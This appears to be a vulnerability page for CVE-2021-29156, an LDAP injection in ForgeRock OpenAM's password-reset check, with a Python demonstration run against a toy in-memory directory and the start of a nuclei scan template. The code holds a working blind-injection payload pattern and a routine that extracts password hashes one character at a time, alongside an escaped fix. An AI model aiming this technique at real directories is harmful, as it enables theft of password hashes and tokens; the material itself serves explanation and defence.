
CVE-2021-29156 PoC — ForgeRock OpenAM Injection Vulnerability

Associated Vulnerability
Title: ForgeRock OpenAM Injection Vulnerability (CVE-2021-29156)
Description: ForgeRock OpenAM is an open-source single sign-on (SSO) framework from the US company ForgeRock. It provides core identity services (CoreServer) to deliver transparent single sign-on, whether centralized or distributed, across a network architecture. ForgeRock OpenAM before 13.5.1 contains an injection vulnerability that lets an attacker retrieve password hashes character by character, or retrieve session tokens or private keys.
Description
OpenAM contains an LDAP injection vulnerability in its password-reset flow. When a user asks to reset their password, they are prompted for a username, and the backend checks whether that user exists by running an LDAP query built from the submitted value. If the user exists, a password-reset token is sent to the user's email address. Because the submitted username is placed into the LDAP filter without escaping, the exists/does-not-exist response acts as a yes/no oracle: an attacker can append further filter conditions to the username and enumerate attribute values character by character, up to retrieval of a full password hash.
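The following is an added illustration of the oracle described above; it is not code from the original page, from the nuclei template, or from OpenAM. The filter shape `(&(uid=<username>)(objectClass=inetOrgPerson))` used by the existence check, the in-memory directory, the placeholder password hash and the tiny filter evaluator are all constructed assumptions standing in for a real LDAP server. It shows the unescaped concatenation that makes the check injectable, the character-by-character extraction it enables, and the same check with RFC 4515 escaping applied, against which the extraction fails.

```python
"""Blind LDAP injection oracle of the kind described for CVE-2021-29156.

Constructed example: a toy in-memory directory and a minimal filter evaluator
replace the LDAP server; the filter used by the user-existence check is an
assumption, not taken from OpenAM's source.
"""
import re
import string

# Constructed directory; the userPassword values are placeholders, not real hashes.
DIRECTORY = [
    {"uid": "alice", "objectClass": "inetOrgPerson",
     "userPassword": "{SSHA}dGhpcyBpcyBub3QgYSByZWFsIGhhc2g="},
    {"uid": "bob", "objectClass": "inetOrgPerson",
     "userPassword": "{SSHA}YW5vdGhlciBwbGFjZWhvbGRlcg=="},
]

_HEX_ESCAPE = re.compile(r"\\([0-9a-fA-F]{2})")


def ldap_escape(value):
    """RFC 4515 escaping for a value placed inside a filter assertion."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)


def ldap_unescape(value):
    """Turn RFC 4515 \\xx escapes back into literal characters (no wildcard meaning)."""
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def _parse(s, i):
    """Parse one filter component at s[i] == '('; supports (&...), equality,
    presence (attr=*) and trailing-wildcard prefix (attr=abc*) assertions."""
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] == "&":
        children, i = [], i + 1
        while s[i] == "(":
            node, i = _parse(s, i)
            children.append(node)
        if s[i] != ")":
            raise ValueError("unterminated AND at offset %d" % i)
        return ("and", children), i + 1
    eq = s.index("=", i)
    close = s.index(")", eq)          # a raw ')' ends the value: this is the injection point
    attr, raw = s[i:eq].lower(), s[eq + 1:close]
    if raw == "*":
        node = ("present", attr)
    elif raw.endswith("*") and "*" not in raw[:-1]:
        node = ("prefix", attr, ldap_unescape(raw[:-1]))
    elif "*" in raw:
        raise ValueError("only trailing-wildcard substrings are supported")
    else:
        node = ("equals", attr, ldap_unescape(raw))
    return node, close + 1


def parse_filter(s):
    node, end = _parse(s, 0)
    if end != len(s):
        raise ValueError("trailing data after filter: %r" % s[end:])
    return node


def _matches(node, entry):
    if node[0] == "and":
        return all(_matches(child, entry) for child in node[1])
    value = next((v for k, v in entry.items() if k.lower() == node[1]), None)
    if value is None:
        return False
    if node[0] == "present":
        return True
    return value.startswith(node[2]) if node[0] == "prefix" else value == node[2]


def search(filter_str):
    node = parse_filter(filter_str)
    return [e for e in DIRECTORY if _matches(node, e)]


def _exists(filter_str):
    try:
        return bool(search(filter_str))
    except (ValueError, IndexError):
        return False  # a real server would return an error rather than a match


def user_exists_vulnerable(username):
    """Pre-fix pattern: the username is concatenated straight into the filter."""
    return _exists("(&(uid=%s)(objectClass=inetOrgPerson))" % username)


def user_exists_hardened(username):
    """Same check with the value escaped per RFC 4515 before it enters the filter."""
    return _exists("(&(uid=%s)(objectClass=inetOrgPerson))" % ldap_escape(username))


ALPHABET = string.ascii_letters + string.digits + "{}+/="


def extract_attribute(oracle, uid, attr, alphabet=ALPHABET, max_len=64):
    """Recover entry[attr] of user `uid` one character at a time, observing only
    the yes/no answer of the existence check. Returns None if nothing is recovered."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            if oracle("%s)(%s=%s%s*" % (uid, attr, known, ch)):
                known += ch
                break
        else:
            break  # no character extends the prefix: complete, or not injectable
    if known and oracle("%s)(%s=%s" % (uid, attr, known)):  # exact match confirms the value
        return known
    return None


if __name__ == "__main__":
    print("vulnerable:", extract_attribute(user_exists_vulnerable, "alice", "userPassword"))
    print("hardened:  ", extract_attribute(user_exists_hardened, "alice", "userPassword"))
```

Against the vulnerable check, `extract_attribute` recovers alice's full userPassword value with one oracle query per alphabet character per position; against the hardened check every probe becomes a literal uid lookup and nothing is recovered. The same escaping defeats the wildcard probe `*`, which otherwise makes the existence check answer yes for any directory.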
File Snapshot

id: CVE-2021-29156
info:
  name: LDAP Injection In OpenAM
  author: melbadry9,xelkomy
  severity: h ...